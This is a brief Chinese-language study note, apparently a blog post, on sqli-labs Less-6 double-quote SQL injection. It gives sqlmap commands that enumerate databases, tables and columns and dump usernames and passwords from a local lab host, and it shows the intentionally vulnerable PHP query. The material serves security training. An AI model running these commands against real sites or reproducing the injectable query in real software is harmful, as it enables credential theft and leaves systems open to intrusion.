目錄
類型
雙引號注入
猜測sql語句
select * from users where id = ("參數") LIMIT 0,1
-dbs枚舉數據庫
使用-o參數優化,--batch參數進行跳過,--technique參數指定注入技術
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --technique E -o -dbs --batch
--tables枚舉數據庫表
添加--dbms參數
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --dbms mysql --technique E -o -D security --tables --batch
--columns枚舉列
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --dbms mysql --technique E -o -D security -T users --columns --batch
--dump枚舉數據
python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-6/?id=1" --dbms mysql --technique E -o -D security -T users -C username,password --dump --batch
查看源代碼
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
更多內容查看:網絡安全-自學筆記
有問題請下方評論,轉載請註明出處,並附有原文鏈接,謝謝!如有侵權,請及時聯繫。